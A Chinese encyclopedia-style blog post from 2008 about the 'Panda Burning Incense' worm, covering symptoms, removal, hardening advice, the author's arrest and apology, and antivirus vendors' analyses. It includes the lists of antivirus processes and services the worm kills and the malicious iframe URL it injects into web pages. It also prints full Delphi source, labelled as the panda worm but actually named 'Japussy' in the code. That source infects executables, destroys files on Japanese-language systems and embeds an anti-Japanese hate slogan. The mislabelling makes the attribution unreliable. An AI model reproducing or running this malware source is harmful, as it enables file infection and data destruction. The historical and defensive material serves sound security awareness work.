熊猫烧香

作者: Robin 分类: 百科知识 发布时间: 2008-10-30 10:30

【基本信息】

病毒名称:熊猫烧香 ,worm.whBoy.(金山称),worm.nimaya.(瑞星称)
病毒别名:尼姆亚武汉男生,后又化身为“金猪报喜
危险级别:★★★★★
病毒类型:蠕虫病毒,能够终止大量的反病毒软件防火墙软件进程。
影响系统:Win 9x/ME、Win 2000/NT、Win XP、Win 2003

【病毒描述】

其实是一种蠕虫病毒的变种,而且是经过多次变种而来的。尼姆亚变种W(Worm.Nimaya.w),由于中毒电脑的可执行文件会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。同时,该病毒的某些变种可以通过局域网进行传播,进而感染局域网内所有计算机系统,最终导致企业局域网瘫痪,无法正常使用,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

【中毒症状】

除了通过网站带毒感染用户之外,此病毒还会在局域网中传播,在极短时间之内就可以感染几千台计算机,严重时可以导致网络瘫痪。中毒电脑上会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

【危害】

病毒会删除扩展名为gho的文件,使用户无法使用ghost软件恢复操作系统。“熊猫烧香”感染系统的.exe .com. f.src .html.asp文件,添加病毒网址,导致用户一打开这些网页文件,IE就会自动连接到指定的病毒网址中下载病毒。在硬盘各个分区下生成文件autorun.inf和setup.exe,可以通过U盘移动硬盘等方式进行传播,并且利用Windows系统的自动播放功能来运行,搜索硬盘中的.exe可执行文件并感染,感染后的文件图标变成“熊猫烧香”图案。“熊猫烧香”还可以通过共享文件夹、系统弱口令等多种方式进行传播。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。一些网站编辑人员的电脑如果被该病毒感染,上传网页到网站后,就会导致用户浏览这些网站时也被病毒感染。据悉,多家著名网站已经遭到此类攻击,而相继被植入病毒。由于这些网站的浏览量非常大,致使“熊猫烧香”病毒的感染范围非常广,中毒企业和政府机构已经超过千家,其中不乏金融、税务、能源等关系到国计民生的重要单位。注:江苏等地区成为“熊猫烧香”重灾区。

【杀毒方法】

各种版本的熊猫烧香专杀
瑞星:http://it.rising.com.cn/channels/service/2006-11/1163505486d38734.shtml
金山:http://tool.duba.net/zhuansha/253.shtml
江民:http://www.jiangmin.com/download/zhuansha04.htm
超级巡警:http://www.dswlab.com/dow/d2.html
李俊:http://www.xdowns.com/soft/8/21/2007/Soft_34735.html

虽然用户及时更新杀毒软件病毒库,并下载各杀毒软件公司提供的专杀工具,即可对“熊猫烧香”病毒进行查杀,但是如果能做到防患于未然岂不更好。

【解决办法】

【1】 立即检查本机administrator组成员口令,一定要放弃简单口令甚至空口令,安全的口令是字母数字特殊字符的组合,自己记得住,别让病毒猜到就行。

修改方法:右键单击我的电脑,选择管理,浏览到本地用户和组,在右边的窗格中,选择具备管理员权限的用户名,单击右键,选择设置密码,输入新密码就行。

【2】 利用组策略,关闭所有驱动器的自动播放功能。

步骤:单击开始,运行,输入gpedit.msc,打开组策略编辑器,浏览到计算机配置,管理模板,系统,在右边的窗格中选择关闭自动播放,该配置缺省是未配置,在下拉框中选择所有驱动器,再选取已启用,确定后关闭。最后,在开始,运行中输入gpupdate,确定后,该策略就生效了。

【3】 修改文件夹选项,以查看不明文件的真实属性,避免无意双击骗子程序中毒。

步骤:打开资源管理器(按windows徽标键+E),点工具菜单下文件夹选项,再点查看,在高级设置中,选择查看所有文件,取消隐藏受保护的操作系统文件,取消隐藏文件扩展名。

【4】 时刻保持操作系统获得最新的安全更新,不要随意访问来源不明的网站,特别是微软的MS06-014漏洞,应立即打好该漏洞补丁。

同时,QQUC的漏洞也可以被该病毒利用,因此,用户应该去他们的官方网站打好最新补丁。此外,由于该病毒会利用IE浏览器的漏洞进行攻击,因此用户还应该给IE打好所有的补丁。如果必要的话,用户可以暂时换用Firefox、Opera等比较安全的浏览器。

【5】 启用Windows防火墙保护本地计算机。同时,局域网用户尽量避免创建可写的共享目录,已经创建共享目录的应立即停止共享。

此外,对于未感染的用户,病毒专家建议,不要登录不良网站,及时下载微软公布的最新补丁,来避免病毒利用漏洞袭击用户的电脑,同时上网时应采用“杀毒软件+防火墙”的立体防御体系。

【变种病毒】

至此,据不完全统计,仅12月份至今,变种数已达90多个,个人用户感染熊猫烧香的已经高达几百万,企业用户感染数还在继续上升。反防毒专家表示,伴随着各大杀毒厂商对“熊猫烧香”病毒的集中绞杀,该病毒正在不断“繁衍”新的变种,密谋更加隐蔽的传播方式。反病毒专家建议,用户不打开可疑邮件和可疑网站,不要随便运行不知名程序或打开陌生人邮件的附件。

【破案介绍】

我国破获的国内首例制作计算机病毒的大案

[2007年2月12日]湖北省公安厅12日宣布,根据统一部署,湖北网监在浙江、山东、广西、天津、广东、四川、江西、云南、新疆、河南等地公安机关的配合下,一举侦破了制作传播“熊猫烧香”病毒案,抓获病毒作者李俊(男,25岁,武汉新洲区人),他于2006年10月16日编写了“熊猫烧香”病毒并在网上广泛传播,并且还以自己出售和由他人代卖的方式,在网络上将该病毒销售给120余人,非法获利10万余元。

其他重要犯罪嫌疑人:雷磊(男,25岁,武汉新洲区人)、王磊(男,22岁,山东威海人)、叶培新(男,21岁,浙江温州人)、张顺(男,23岁,浙江丽水人)、王哲(男,24岁,湖北仙桃人)通过改写、传播“熊猫烧香”等病毒,构建“僵尸网络”,通过盗窃各种游戏账号等方式非法牟利。

这是中国近些年来,发生比较严重的一次蠕虫病毒发作。影响较多公司,造成较大的损失。且对于一些疏于防范的用户来说,该病毒导致较为严重的损失。
由于此病毒可以盗取用户名与密码,因此,带有明显的牟利目的。所以,作者才有可能将此病毒当作商品出售,与一般的病毒制作者只是自娱自乐、或显示威力、或炫耀技术有很大的不同。

另,制作者李俊在被捕后,在公安的监视下,又在编写解毒软件。

【传播方法】

“熊猫烧香”还可以通过共享文件夹、系统弱口令等多种方式进行传播。
金山分析:这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程

1 拷贝文件
病毒运行后,会把自己拷贝到
C:\WINDOWS\System32\Drivers\spoclsv.exe

2 添加注册表自启动
病毒会添加自启动项
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

3 病毒行为
a:每隔1秒
寻找桌面窗口,并关闭窗口标题中含有以下字符的程序
QQKAV
QQAV
防火墙
进程
VirusScan
网镖
杀毒
毒霸
瑞星
江民
黄山IE
超级兔子
优化大师
木马克星
木马清道夫
QQ病毒
注册表编辑器
系统配置实用程序
卡巴斯基反病毒
Symantec AntiVirus
Duba
esteem proces
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
msctls_statusbar32
pjf(ustc)
IceSword
并使用的键盘映射的方法关闭安全软件IceSword

添加注册表使自己自启动
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

并中止系统中以下的进程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
RAVmond.exe
CCenter.exe
RAVTask.exe
RAV.exe
RAVmon.exe
RAVmonD.exe
RAVStub.exe
KVXP.kxp
kvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe

b:每隔18秒
点击病毒作者指定的网页,并用命令行检查系统中是否存在共享
共存在的话就运行net share命令关闭admin$共享

c:每隔10秒
下载病毒作者指定的文件,并用命令行检查系统中是否存在共享
共存在的话就运行net share命令关闭admin$共享

d:每隔6秒
删除安全软件在注册表中的键值

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RAVTask
KvMonXP
kAV
KAVPersonal50
McAfeeUpdaterUI
Network Associates Error Reporting Service
ShStartEXE
YLive.exe
yassistse

并修改以下值不显示隐藏文件
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue -> 0x00

删除以下服务:
nAVapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc

e:感染文件
病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部
并在扩展名为htm,html, asp,php,jsp,aspx的文件中添加一网址,
用户一但打开了该文件,IE就会不断的在后台点击写入的网址,达到
增加点击量的目的,但病毒不会感染以下文件夹名中的文件:
WINDOW
Winnt
System Volume Information
Recycled
Windows NT
WindowsUpdate
Windows Media Player
Outlook Express
Internet Explorer
NetMeeting
Common Files
ComPlus Applications
Messenger
InstallShield Installation Information
MSN
Microsoft Frontpage
Movie Maker
MSN Gamin Zone

g:删除文件
病毒会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件
使用户的系统备份文件丢失.

瑞星最新病毒分析报告:“Nimaya(熊猫烧香)”

这是一个传染型的DownLoad 使用Delphi编写

【传播对象和运行过程】

★本地磁盘感染
病毒对系统中所有除了盘符为A,B的磁盘类型为DRIVE_REMOTE,DRIVE_FIXED的磁盘进行文件遍历感染
注:不感染文件大小超过10485760字节以上的.
(病毒将不感染如下目录的文件):
Microsoft Frontpage
Movie Maker
MSN Gamin Zone
Common Files
Windows NT
Recycled
System Volume Information
Documents and Settings
……
(病毒将不感染文件名如下的文件):
setup.exe
NTDETECT.COM

病毒将使用两类感染方式应对不同后缀的文件名进行感染
1)二进制可执行文件(后缀名为:EXE,SCR,PIF,COM): 将感染目标文件和病毒溶合成一个文件(被感染文件贴在病毒文件尾部)完成感染.

2)脚本类(后缀名为:htm,html,asp,php,jsp,aspx): 在这些脚本文件尾加上如下链接(下边的页面存在安全漏洞):
<iframe src=http://www.krvkr.com/worm.htm width=height=0></iframe>
在感染时会删除这些磁盘上的后缀名为.GHO

2.★生成autorun.inf
病毒建立一个计时器以,6秒为周期在磁盘的根目录下生成setup.exe(病毒本身) autorun.inf 并利用AutoRun Open关联使病毒在用户点击被感染磁盘时能被自动运行。

3.★局域网传播
病毒生成随机个局域网传播线程实现如下的传播方式:
当病毒发现能成功联接攻击目标的139或445端口后,将使用内置的一个用户列表及密码字典进行联接。(猜测被攻击端的密码)当成功的联接上以后将自己复制过去并利用计划任务启动激活病毒。
修改操作系统的启动关联
下载文件启动
与杀毒软件对抗

【一些报道和评论】

“‘流氓软件’和病毒之间的界限已变得越来越模糊。为了达到更好的传播效果,并减少成本,不少中小厂商直接使用病毒进行‘流氓推广’。”昨日,反病毒专家直指流氓软件是这次“熊猫烧香”幕后黑手。

据江民公司反病毒工程师称,已经发现了近期疯狂肆虐的“熊猫烧香”幕后势力的痕迹,“熊猫烧香”病毒被怀疑是由“超级巡警”软件的提供方在幕后推动,网上已经发现了产销一条龙盗窃销售网游设备的产业链。

而从瑞星截获的“熊猫烧香(Worm.Nimaya)”样本进行分析,也有不少变种运行后会去从网上下载盗取“江湖”、“大话西游”、“魔兽”等网络游戏账号的木马。用户的计算机一旦被感染这些木马,游戏的账号、装备等就会被黑客窃取。黑客通过在网上倒卖网游账号、装备等获利。

流氓软件分化:部分“洗白” 部分病毒化。全民范围内的讨伐使流氓软件开始出现“分化”。

北京瑞星股份有限公司反病毒工程师史瑀向《每日经济新闻》表示,迫于技术和舆论的压力,制作流氓软件的厂商开始两极分化。一些大牌互联网厂商逐渐“洗白”,将软件的“流氓”程度降低,还有一些厂商干脆放弃推广“流氓软件”。然而,仍有大量的中小厂商是通过“流氓软件”起家的,通过“流氓软件”进行广告推广已经成为其公司主要甚至是唯一的收入来源。2006年下半年开始,一些厂商为了生存,不惜铤而走险,使用更加卑劣的手段进行流氓推广,并且采用更加恶毒的技术公然向反病毒软件、反流氓软件工具挑战。

据瑞星公司客户服务中心的统计数据表明,从2006年6月开始,用户计算机由于流氓软件问题导致崩溃的求助数量已经超过了病毒。

据专家介绍,这一时期的“流氓软件”有两大特点:一是编写病毒化。不少“流氓软件”为了防止被杀毒软件或流氓软件卸载工具发现,采用了病毒常用的 Rootkit技术进行自我保护。Rootkit可以对自身及指定的文件进行隐藏或锁定,防止被发现和删除。带有Rootkit的“流氓软件”就像练就了 “金钟罩”、“铁布杉”,不除去这层保护根本难伤其毫发。更有一些流氓软件,采用“自杀式”技术攻击杀毒软件。一旦发现用户安装或运行杀毒软件,便运行恶意代码,直接造成计算机死机、蓝屏,让用户误以为是杀毒软件存在问题。

二是传播病毒化。为了达到更好的传播效果,并减小成本,不少中小厂商直接使用病毒进行“流氓推广”。用户的计算机感染病毒后,病毒会自动在后台运行,下载并安装“流氓软件”。同时,“流氓软件”安装后也会去从互联网自动下载运行病毒。大量的“流氓软件”开始使用电脑病毒来隐藏自身、进行快速传播、并对抗用户的清除等,这些行为严重危害到用户的信息安全和利益。“流氓软件”和病毒之间的界限已变得越来越模糊。随着“流氓软件”不断朝着病毒的方向发展,要想彻底杀灭“流氓软件”就必须采用反病毒技术。

利益驱使 流氓软件制造“熊猫烧香”?

史瑀表示,2006年11月14日,瑞星发布流氓软件专用清除工具———卡卡上网安全助手3.0,首次将反病毒技术应用于反流氓软件当中。就在卡卡刚刚发布 24小时,就有一个名为“my123”的恶意程序顶风作案,疯狂采用病毒化的编写技术来逃避卡卡的追杀,随后又出现了名为“3448.com”和 “7939.com”两个流氓软件,它们锁定用户浏览器的首页以提高其网站访问量。

此后,部分流氓软件开始和病毒合作。早先一个传播较广的蠕虫病毒“威金蠕虫(Worm.Viking)”,就会从病毒作者指定的网站去下载流氓软件、盗号木马等,并种植在用户的计算机上。

“大量‘流氓软件’开始使用电脑病毒来隐藏自身、进行快速传播、并对抗用户的清除等,这些行为严重危害到用户的信息安全和利益。”史瑀称,“‘熊猫烧香’病毒成为一个‘教科书’式的病毒,势必有大量的病毒会模仿它的特征进行编写。”

1 月29日,金山毒霸反病毒中心最新消息:“熊猫烧香”化身“金猪”,危害指数再度升级,按照目前“熊猫烧香”破坏程度,威胁将延伸至春节。而在瑞星全球反病毒监测网27日监测结果显示,27日一个“电眼间谍变种BSF(Trojan.Spy.Delf.bsf)”病毒又出现,该病毒与“熊猫烧香”病毒类似。

而业内人士称,近日由于地震引起海底光缆中断,造成数百万使用国外杀毒软件的个人用户、数十万企业和政府局域网用户无法升级。这又意味着这些用户的电脑完全向病毒和黑客敞开了大门。

“在没有法律法规出台前,流氓软件是不会缩手的,不排除‘熊猫烧香’是流氓软件所为。”昨日,中国反流氓软件联盟李佳衡表示:“只要有利益驱使,流氓软件就会变化形式,以更不容易察觉的病毒方式毫无忌惮地牟取利益。”

熊猫烧香”化身“金猪”,春节大爆发。

“长假是病毒的高发期,特别是长假之后,病毒综合症接踵而来。”金山毒霸反病毒专家戴光剑说,“目前我们已经截获‘金猪’的变种。被感染的电脑中不但‘熊猫’成群,而且‘金猪’能使系统被破坏,大量软件无法应用。”这一观点得到了上海市计算机病毒防范服务中心的认同。

一旦中毒,用户也不用慌张,用户可拨打上海市信息化服务热线电话9682000寻求帮助。张丹

“熊猫烧香”病毒攻略:防御和解除方法

计世网消息在2007年新年出现的“PE_FUJACKS”就是最近让广大互联网用户闻之色变的“熊猫烧香”。该病毒的作者为“武汉男生”(文件末签名” WhBoy”),这个版本的病毒已经集成了PE_FUJA CK和QQ大盗的代码,通过网络共享,文件感染和移动存储设备传播,尤其是感染网页文件,并在网页文件写入自动更新的代码,一旦浏览该网页,就会感染更新后的变种。

不幸中招的用户都知道,“熊猫烧香”会占用局域网带宽,使得电脑变得缓慢,计算机会出现以下症状:熊猫烧香病毒会在网络共享文件夹中生成一个名为GameSetup.exe的病毒文件;结束某些应用程序以及防毒软件的进程,导致应用程序异常,或不能正常执行,或速度变慢;硬盘分区或者U盘不能访问使用;exe程序无法使用程序图标变成熊猫烧香图标;硬盘的根目录出现setup.exe auturun.INF文件;同时浏览器会莫名其妙地开启或关闭。

该病毒主要通过浏览恶意网站、网络共享、文件感染和移动存储设备(如U盘)等途径感染,其中网络共享和文件感染的风险系数较高,而通过Web和移动存储感染的风险相对较低。该病毒会自行启动安装,生成注册列表和病毒文件%System%\ drivers\spoclsv.exe ,并在所有磁盘跟目录下生成病毒文件setup.exe,autorun.inf 。

【熊猫烧香的病毒源码】

program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = EB8; //PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量

{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = BC; //Upx压缩过PE文件主图标的偏移量

//Upx 1.24W 用法: upx -9 –8086 Japussy.exe
}
IconSize = E8; //PE文件主图标的大小744字节
IconTail = IconOffset + IconSize; //PE文件主图标的尾部
ID = 444444; //感染标记

//无用码,以备写入
Catchword = ‘If a race need to be killed out, it must be Yamato. ‘ +
‘If a country need to be destroyed, it must be Japan! ‘ +
‘*** W32.Japussy.Worm.A ***’;
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stDCall; external ‘Kernel32.dll’; //函数声明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文版操作系统标记
{ 判断是否为windows 9.X版本 }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size – HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//邮件终止
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用,退出
if CompareText(FileName, ‘JAPUSSY.EXE’) = 0 then //是自己则不感染
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to 8 do //检查PE文件头
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
begin
IsPE := True; //是PE文件
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //检查感染标记
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size < 10240) then //小于10240的文件不被感染
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//得到被感染文件的主图标(744字节),存入流
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SAVeToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//头文件
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//写入病毒体主图标之前的数据
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
//写入目前程序的主图标
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
//写入病毒体主图标到病毒体尾部之间的数据
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize – IconTail);
//写入宿主程序
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//写入已感染的标记
DstStream.Seek(0, 2);
iID := 444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SAVeToFile(FileName); //替换宿主文件
DstStream.Free;
end;
except;
end;
end;
{ 将目标文件写入无用码后删除 }
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只读属性
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
try
Size := GetFileSize(FileHandle, nil); //获取文件大小
i := 0;
Randomize;
Max := Random(15); //写入无用码的随机次数
if Max < 5 then
Max := 5;
Mass := Size div Max; //每个间隔块的大小
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//写入无用码,将文件彻底破坏!
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); //关闭文件
end;
DeleteFile(PChar(FileName)); //删除
except
end;
end;
{ 获得可以写入的驱动器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
D := Chr(i + 65);
Str := D + ‘:\’;
DiskType := GetDriveType(PChar(Str));
//得到本地磁盘和网络盘
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ 遍历目录,感染和摧毁文件 }
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr <> 16) and (SearchRec.Name <> ‘.’) and
(SearchRec.Name <> ‘..’) then
Result := 0 //不是目录
else if (SearchRec.Attr = 16) and (SearchRec.Name <> ‘.’) and
(SearchRec.Name <> ‘..’) then
Result := 1 //不是根目录
else Result := 2; //是根目录
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = ‘.EXE’) or (Ext = ‘.SCR’) then
begin
InfectOneFile(Fn); //感染可执行文件
end
else if (Ext = ‘.HTM’) or (Ext = ‘.HTML’) or (Ext = ‘.ASP’) then
begin
//感染HTML和ASP文件,将Base64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之?
end
else if Ext = ‘.WAB’ then //Outlook地址簿文件
begin
//获取Outlook邮件地址
end
else if Ext = ‘.ADC’ then //Foxmail地址自动完成文件
begin
//获取Foxmail邮件地址
end
else if Ext = ‘IND’ then //Foxmail地址簿文件
begin
//获取Foxmail邮件地址
end
else
begin
if IsJap then //是倭文操作系统
begin
if (Ext = ‘.DOC’) or (Ext = ‘.XLS’) or (Ext = ‘.MDB’) or
(Ext = ‘.MP3’) or (Ext = ‘.RM’) or (Ext = ‘.RA’) or
(Ext = ‘.WMA’) or (Ext = ‘.ZIP’) or (Ext = ‘.RAR’) or
(Ext = ‘.MPEG’) or (Ext = ‘.ASF’) or (Ext = ‘.JPG’) or
(Ext = ‘.JPEG’) or (Ext = ‘.GIF’) or (Ext = ‘.SWF’) or
(Ext = ‘.PDF’) or (Ext = ‘.CHM’) or (Ext = ‘.AVI’) then
SmashFile(Fn); //摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + ‘*.*’, faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
Count := SubDir.Count – 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + ‘\’, Mask);
FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系统
IsJap := True; //去死吧!
DriverList := GetDrives; //得到可写的磁盘列表
Len := Length(DriverList);
while True do //死循环
begin
for i := Len downto 1 do //遍历每个磁盘驱动器
LoopFiles(DriverList + ‘:\’, ‘*.*’); //感染之
SendMail; //发带毒邮件
Sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
else //WinNT
begin
//远程线程映射到Explorer进程
//
end;
//如果是原始病毒体自己
if CompareText(ExtractFileName(ParamStr(0)), ‘Japussy.exe’) = 0 then
InfectFiles //感染和发邮件
else //已寄生于宿主程序并开始工作
begin
TmpFile := ParamStr(0); //创建临时文件
Delete(TmpFile, Length(TmpFile) – 4, 4);
TmpFile := TmpFile + #32 + ‘.exe’; //真正的宿主文件,多一个空格
ExtractFile(TmpFile); //分离之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, ‘.’, Si, Pi); //创建新进程运行之
InfectFiles; //感染和发邮件
end;
end.
CMD命令 shutdown -a //取消计算机中病毒后的倒记时关机。

【熊猫烧香的第一版作者道歉信】

各位网友:
你们好!我是熊猫烧香的第一版作者.
我真的没有想到熊猫烧香在短短的两个月竟然疯狂感染到这个地步,真的是我的不对,或许真的是我低估了网络的力量,它的散播速度是我想不到的!对于所有中毒的网友,企业来说,可能是一个很大的打击,我对此表示深深的歉意!很对不起!
我要解释一些事情,有人说熊猫烧香更改熊猫的图标是我在诋毁大熊猫!这里我要解释下,这是绝对没有的事情,完全是出于这个图片比较让我个人喜欢,才会用的!
还有关于变种,我写这个的初衷也是这个,纯粹是为了编程研究,对于出了这么多变种,我是根本想不到的,这个责任也不全是在我的!还有人说熊猫病毒写出来是商业目的!这个完全是无稽之谈.我在这里承诺,本人是绝对没有更新过任何变种!
关于中毒后的一些错误,有人中毒后会有蓝屏,无声,卡死,文件丢失这些现象!蓝屏和死机的原因很多可能,熊猫的主程序是不会造成电脑死机或蓝屏的,更不会把别人里面的文件弄丢失!
还有人说我是个心理变态,我在前面已经说了,感染的速度,变种的数量是我所料想不到的.还有,我写这个病毒的初衷完全是为了编程研究.对于这个评论,我也就不多说什么了!
最后就是关于我的身份,大家不要再猜测我是谁了,15岁的武汉男生也好,是个女的也好,某公司老总也好,杀毒厂商也好,光是新闻的评论,网友的臭骂已经让我后悔之极了!希望熊猫病毒不要再成为炒作的娱乐新闻,不要再出任何关于熊猫新闻和评论!希望安全软件公司,不要吹嘘,相互诋毁,相互炒作,尽力做出让人们信赖的好安全软件!谢谢大家!
这是我写的一个专杀程序,肯定是比不上专业级的杀毒软件了,但是我想这是我最后能给大家做的事情了.
熊猫走了,是结束吗?不是的,网络永远没有安全的时候,或许在不久,会有很多更厉害的病毒出来!所以我在这里提醒大家,提高网络安全意识,并不是你应该注意的,而是你必须懂得和去做的一些事情!
再一次表示深深的歉意,同时我发出这个专杀,愿能给大家带来帮助!
熊猫烧香的作者
2007年2月9日于仙桃市第一看守所

【变种:金猪报喜】

金猪报喜病毒实际就是最近熊猫烧香的新变种,

春节将至,然而广大网络用户仍没有彻底摆脱“熊猫烧香”的阴霾。伴随着大量“熊猫烧香”变种的出现,对用户的危害一浪高过一浪。1月29日,来自金山毒霸反病毒中心最新消息:“熊猫烧香”化身“金猪”,危害指数再度升级,被感染的电脑中不但“熊猫”成群,而且“金猪”满圈。但象征财富的金猪仍然让用户无法摆脱“系统被破坏,大量应用软件无法应用”的噩梦。

病毒描述:

“武汉男生”,俗称“熊猫烧香”,近日又化身为“金猪报喜” ,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成可爱金猪的模样。

1月30日,江民科技反病毒中心监测到,肆虐互联网的“熊猫烧香”又出新变种。此次变种把“熊猫烧香”图案变成“金猪报喜”。江民反病毒专家提醒用户,春节临近,谨防春节期间病毒借人们互致祝福之际大面积爆发。

